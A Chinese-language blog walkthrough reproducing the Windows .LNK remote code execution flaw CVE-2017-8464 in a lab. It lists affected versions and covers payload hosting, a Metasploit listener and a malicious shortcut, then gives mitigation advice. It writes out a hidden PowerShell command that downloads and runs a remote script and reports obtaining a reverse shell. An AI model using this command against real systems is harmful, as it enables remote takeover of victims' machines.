CVE-2017-8464 远程命令执行漏洞复现

  • A+
所属分类:安全文章

一、 漏洞成因

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。

 

二、 影响版本

漏洞影响范围: 

Microsoft Windows 10 Version 1607 for 32-bit Systems

Microsoft Windows 10 Version 1607 for x64-based Systems

Microsoft Windows 10 for 32-bit Systems

Microsoft Windows 10 for x64-based Systems

Microsoft Windows 10 version 1511 for 32-bit Systems

Microsoft Windows 10 version 1511 for x64-based Systems

Microsoft Windows 10 version 1703 for 32-bit Systems

Microsoft Windows 10 version 1703 for x64-based Systems

Microsoft Windows 7 for 32-bit Systems SP1

Microsoft Windows 7 for x64-based Systems SP1

Microsoft Windows 8.1 for 32-bit Systems

Microsoft Windows 8.1 for x64-based Systems

Microsoft Windows RT 8.1

服务器系统

Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

Microsoft Windows Server 2008 R2 for x64-based Systems SP1

Microsoft Windows Server 2008 for 32-bit Systems SP2

Microsoft Windows Server 2008 for Itanium-based Systems SP2

Microsoft Windows Server 2008 for x64-based Systems SP2

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

 

三、 复现步骤

1. 打开kali终端,生成一个powershell文件

CVE-2017-8464 远程命令执行漏洞复现

2. 然后将生成的文件移动至/var/www/html目录下

CVE-2017-8464 远程命令执行漏洞复现

3. 启动MSF,使用监听模块multi/handler,并配置好对应选项

CVE-2017-8464 远程命令执行漏洞复现

CVE-2017-8464 远程命令执行漏洞复现

4. 开始监听;

CVE-2017-8464 远程命令执行漏洞复现

5. 切换到windows server2008,创建一个快捷方式

CVE-2017-8464 远程命令执行漏洞复现

我们在这里输入构造好的路径代码:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://IP/1.ps1');test.ps1"

6. 点击完成,生成的就是一个powershell快捷方式;

CVE-2017-8464 远程命令执行漏洞复现

8.我们双击运行一下快捷方式,因为这个快捷方式秒退,无法截图;

9.回kali虚拟机,发现已经反弹到了shell

CVE-2017-8464 远程命令执行漏洞复现

10.建立一个1.txt的文件夹。

CVE-2017-8464 远程命令执行漏洞复现

CVE-2017-8464 远程命令执行漏洞复现 

 四、 修复建议

建议在服务器环境执行以下缓解措施:禁用U盘、网络共享及关闭Webclient Service。请管理员关注是否有业务与上述服务相关并做好恢复准备。Windows搜索远程命令执行漏洞(CVE-2017-8543)关闭Windows Search服务。

*参考来源:网络

PS:如果觉得本篇文章对您有所帮助,欢迎关注!帮忙点个赞,转发一下 分享出去吧,有问题可以公众号回复私聊小编,看到就会及时回复,也可加小编微信入群交流哦~~!


CVE-2017-8464 远程命令执行漏洞复现


一起加油哦~

CVE-2017-8464 远程命令执行漏洞复现

◆Burp Suite | json-web-tokens 插件

◆Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现

◆永恒之黑(CVE-2020-0796)漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: